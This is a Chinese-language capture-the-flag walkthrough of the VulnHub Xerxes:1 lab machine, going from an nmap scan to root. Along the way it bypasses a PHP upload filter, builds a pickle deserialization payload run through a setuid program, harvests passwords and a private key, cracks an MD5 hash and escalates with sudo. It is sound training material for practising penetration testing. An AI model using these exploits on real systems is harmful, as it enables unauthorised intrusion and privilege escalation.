you can download it here: https://www.vulnhub.com/entry/xerxes-1,58/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-18 12:10 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:10
Completed NSE at 12:10, 0.00s elapsed
Initiating NSE at 12:10
Completed NSE at 12:10, 0.00s elapsed
Initiating ARP Ping Scan at 12:10
Scanning 192.168.227.178 [1 port]
Completed ARP Ping Scan at 12:10, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:10
Completed Parallel DNS resolution of 1 host. at 12:10, 0.00s elapsed
Initiating SYN Stealth Scan at 12:10
Scanning 192.168.227.178 [65535 ports]
Discovered open port 22/tcp on 192.168.227.178
Discovered open port 80/tcp on 192.168.227.178
Completed SYN Stealth Scan at 12:10, 2.50s elapsed (65535 total ports)
Initiating Service scan at 12:10
Scanning 2 services on 192.168.227.178
Completed Service scan at 12:10, 6.01s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.227.178
NSE: Script scanning 192.168.227.178.
Initiating NSE at 12:10
Completed NSE at 12:10, 0.20s elapsed
Initiating NSE at 12:10
Completed NSE at 12:10, 0.00s elapsed
Nmap scan report for 192.168.227.178
Host is up (0.00072s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
| 1024 78:63:e9:43:33:d3:80:0e:b2:83:15:26:fc:41:ea:17 (DSA)
| 2048 48:69:ae:38:d5:a1:05:e2:f5:22:45:49:35:b0:ca:5c (RSA)
|_ 256 14:3c:81:fb:32:dd:70:70:05:63:1a:d2:8e:ef:32:64 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries
|_/ /dev
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:40:51:66 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Uptime guess: 0.284 days (since Tue Jun 18 05:21:38 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.72 ms 192.168.227.178

NSE: Script Post-scanning.
Initiating NSE at 12:10
Completed NSE at 12:10, 0.00s elapsed
Initiating NSE at 12:10
Completed NSE at 12:10, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.22 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

查看80端口

1

似乎是一个文件上传组建,但是需要密码,尝试爆破未果,看下那个忘记密码的链接,给了一张二维码,扫出来是叫我dig deeper,难道有文件隐写?用stegsolve导入图片,发现在alpha通道处,左上角有内容。

2

3

看上去是base64编码,解码之后是brainfuck加密内容,再次解密得到密码 45100

4

5

发现上传组件有过滤,简单绕过一下,上传php.php文件即可

6

读了一下上传组件代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php

$password = $_POST["password"];
$disallowedExts = array("php", "html");

$ok = 1;
foreach ($disallowedExts as &$ext) {
if (strpos($_FILES["upload_file"]["name"], $ext))
{
echo "Error: illegal file detected.<br>";
$ok = 0;
}
}

strpos($_FILES["upload_file"]["name"], $ext) 返回$ext在文件名中第一次出现的位置,对于php.php来说,php出现在开头,故返回0,通过验证。黑名单也很好绕过,上传pht文件即可,或者配合htaccess文件来解析任意后缀文件。

反弹shell

7

查看有/bin/bash权限的用户

1
2
3
4
cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
amanpour:x:1001:1001:Taz Amanpour,,,:/home/amanpour:/bin/bash
curtiz:x:1002:1002:Juan Curtiz,,,:/home/curtiz:/bin/bash

查找设置了suid位的可执行文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
find / -perm -u=s -type f 2>/dev/null
/opt/notes
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
/usr/bin/procmail
/usr/bin/passwd
/usr/bin/at
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudoedit
/bin/umount
/bin/su
/bin/ping6
/bin/mount
/bin/ping

这个/opt/notes很可疑,查看一下

1
2
3
4
5
6
7
8
9
cd /opt
ls -al
total 20
drwxr-xr-x 2 root root 4096 Dec 18 2013 .
drwxr-xr-x 22 root root 4096 Dec 17 2013 ..
-rwsr-s--x 1 curtiz notes 5111 Dec 18 2013 notes
-rwxr-x--- 1 curtiz notes 1343 Dec 19 2013 notes.py
file notes
notes: setuid setgid executable, regular file, no read permission

notes.py 猜测是notes的源码,notes被编译成可执行文件之后加上了suid位,owner是curtiz,猜测是需要用notes来获取curtiz的shell,然而权限不够,无法阅读notes.py的源码。转到home文件夹下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
www-data@xerxes:/home/amanpour$ ls
ls
lostpassword.png newpassword qr steqr.py
www-data@xerxes:/home/amanpour$ ls -al
ls -al
total 44
drwxr-xr-x 3 amanpour amanpour 4096 Dec 19 2013 .
drwxr-xr-x 5 root root 4096 Dec 17 2013 ..
-rwxr--r-- 1 amanpour amanpour 312 Jun 18 14:53 .bash_history
-rw-r--r-- 1 amanpour amanpour 220 Dec 17 2013 .bash_logout
-rw-r--r-- 1 amanpour amanpour 3433 Dec 19 2013 .bashrc
-rw-r--r-- 1 amanpour amanpour 675 Dec 17 2013 .profile
drwx------ 2 amanpour amanpour 4096 Dec 19 2013 .ssh
-rw-r--r-- 1 amanpour amanpour 1240 Dec 18 2013 lostpassword.png
-rw-r--r-- 1 amanpour amanpour 1220 Dec 18 2013 newpassword
-rw-r--r-- 1 amanpour amanpour 1071 Dec 17 2013 qr
-rw-r--r-- 1 amanpour amanpour 1235 Dec 18 2013 steqr.py
www-data@xerxes:/home/amanpour$ cat .bash_history
cat .bash_history
file qr
python steqr.py -f qr -s hehehehe
python steqr.py -f qr-enc.png
python steqr.py -f qr -s "KysrKysrWz4rKysrKysrKzwtXT4rKysrLisuLS0tLS4tLi4="
mv qr-enc.png lostpassword.png
python steqr.py -f lostpassword.png | base64 -d
python steqr.py -f newpassword
passwd
exit
whoami
exit
whoami
whoami
cd /opt
ls
exit

注意到amapour执行完python steqr.py -f newpassword之后马上就执行了passwd命令,猜测是使用python steqr.py -f newpassword的输出来作为新的密码。

1
2
3
4
5
6
7
8
9
10
11
www-data@xerxes:/home/amanpour$ python steqr.py -f newpassword
python steqr.py -f newpassword
b56d9d8b6077fb56127d1c8ff84ece11
www-data@xerxes:/home/amanpour$ su amanpour
su amanpour
Password: b56d9d8b6077fb56127d1c8ff84ece11

amanpour@xerxes:~$ id
id
uid=1001(amanpour) gid=1001(amanpour) groups=1001(amanpour),1003(notes)

发现有权限读取notes.py的内容了,回到/opt来阅读notes.py的源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#!/usr/bin/python

import pickle

notes = []

def save(filename):
if len(filename) < 1:
filename = "notes"
f = open("/home/curtiz/" + filename, "wb")
pickle.dump(notes, f)
f.close()
return 0

def load(filename):
if len(filename) < 1:
filename = "notes"
f = open("/home/curtiz/" + filename, "rb")
notes = pickle.load(f)
f.close()
return notes

def main():
global notes
print ""
print "-------------------------------"
print " Welcome to Juan's to-do list! "
print " type help for more info "
print "-------------------------------"

while True:
raw_cmd = raw_input()
cmd = raw_cmd.split()
if (len(cmd) > 0):
if "help" == cmd[0]:
print " Available commands:"
print " - add [note] : add a note for Juan"
print " - show : show to-do list"
print " - save [file] : save to-do list"
print " - load [file] : load to-do list"
print " - quit : exit"
print ""

if "add" == cmd[0]:
#print "add"
notes.append(" - " + raw_cmd[4:])

if "save" == cmd[0]:
#print "save"
save(raw_cmd[5:])

if "load" == cmd[0]:
#print "load"
notes = load(raw_cmd[5:])

if "show" == cmd[0]:
#print "show"
for note in notes:
print note

if "quit" == cmd[0] or "exit" == cmd[0]:
return 0
return 0

if __name__ == "__main__":
main()

注意到他使用了pickle模块的load方法,我记得这个反序列方法是可以执行任意命令的。

1
2
3
4
5
6
7
8
9
10
11
12
import cPickle
import os

class genpoc(object):
def __reduce__(self):
s = """whoami"""
return os.system, (s,)

e = genpoc()
poc = cPickle.dumps(e)

print poc
1
2
3
4
5
6
7
8
9
10
11
12
13
amanpour@xerxes:/opt$ python /tmp/test.py > /tmp/poc
python /tmp/test.py > /tmp/poc
amanpour@xerxes:/opt$ ./notes
./notes

-------------------------------
Welcome to Juan's to-do list!
type help for more info
-------------------------------
load ../../tmp/poc
load ../../tmp/poc
curtiz

成功以curtiz身份执行whoami命令,将whoami改成/bin/sh,获取curtiz的shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
amanpour@xerxes:/opt$ python /tmp/test.py > /tmp/poc
python /tmp/test.py > /tmp/poc
amanpour@xerxes:/opt$ ./notes
./notes

-------------------------------
Welcome to Juan's to-do list!
type help for more info
-------------------------------
load ../../tmp/poc
load ../../tmp/poc
$ whoami
whoami
curtiz
$ cd /home/curtiz
cd /home/curtiz
$ ls
ls
id_rsa notes notes.bak
$ cat notes
cat notes
(lp0
S" - I've found Marie's keyfile and was able to login via ssh,"
p1
aS' - but it seems she has added another layer of protection...'
p2
a.
$ cat /etc/passwd | grep Marie
cat /etc/passwd | grep Marie
delacroix:x:1000:1000:Marie Delacroix,,,:/home/delacroix:/bin/delacroix


id_rsa应该是delacroix的ssh私钥,下载下来尝试登陆,发现需要输入密码,仔细一看发现delacroix的shell是/bin/delacroix,下载下来丢进idapro进行分析。

8

9

很清楚了,将用户输入的密码进行md5摘要,再与3d054afb77714ca938d8bca104fcb141对比,直接解密3d054afb77714ca938d8bca104fcb141得到VonBraun

登入delacroix的ssh账号

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
root@kali:~# ssh -i id_rsa delacroix@192.168.227.178
Linux xerxes 3.2.0-4-486 #1 Debian 3.2.51-1 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 18 12:07:35 2019 from 192.168.227.160
Password: VonBraun
XERXES checking security...
Your password has expired. Please generate a new one.
XERXES wishes you
a nice day
delacroix@xerxes:/home/delacroix$ whoami
delacroix
delacroix@xerxes:/home/delacroix$ id
uid=1000(delacroix) gid=1000(delacroix) groups=1000(delacroix),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev)
delacroix@xerxes:/home/delacroix$ ls
check.sh generate.sh
delacroix@xerxes:/home/delacroix$ history
1 whoami
2 id
3 sudo su
4 exit
5 ./generate.sh
6 passwd
7 sudo su
8 exit
9 ssh-keygen -t rsa
10 cd .ssh
11 ls -alh
12 cat id_rsa.pub > authorized_keys
13 ls -alh
14 chmod 700 authorized_keys
15 ls -alh
16 exit

注意到delacroix在执行./generate.sh之后执行了passwd命令修改密码,说明上一次的密码是./generate.sh的输出。阅读generate.sh的内容

1
2
3
4
5
6
7
delacroix@xerxes:/home/delacroix$ cat generate.sh
#!/bin/sh
touch .last && p=$(date | awk '{print $4}' | md5sum | awk '{print $1}')
echo "XERXES has generated a new password: $p"
echo " XERXES is forever"
echo " at your service"

首先创建.touch的空文件,然后获取当前的日期时间,用awk来选取时间信息,进行md5摘要操作,那么.last的的创建时间就是delacroix的密码种子了。

1
2
3
4
5
6
7
8
9
10
11
12
delacroix@xerxes:/home/delacroix$ echo "00:19:51" |md5sum           
6cf49e97c915079e27c09d41da9d95e4 -
delacroix@xerxes:/home/delacroix$ sudo -l
Matching Defaults entries for delacroix on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User delacroix may run the following commands on this host:
(ALL : ALL) ALL
delacroix@xerxes:/home/delacroix$ sudo su
root@xerxes:/home/delacroix#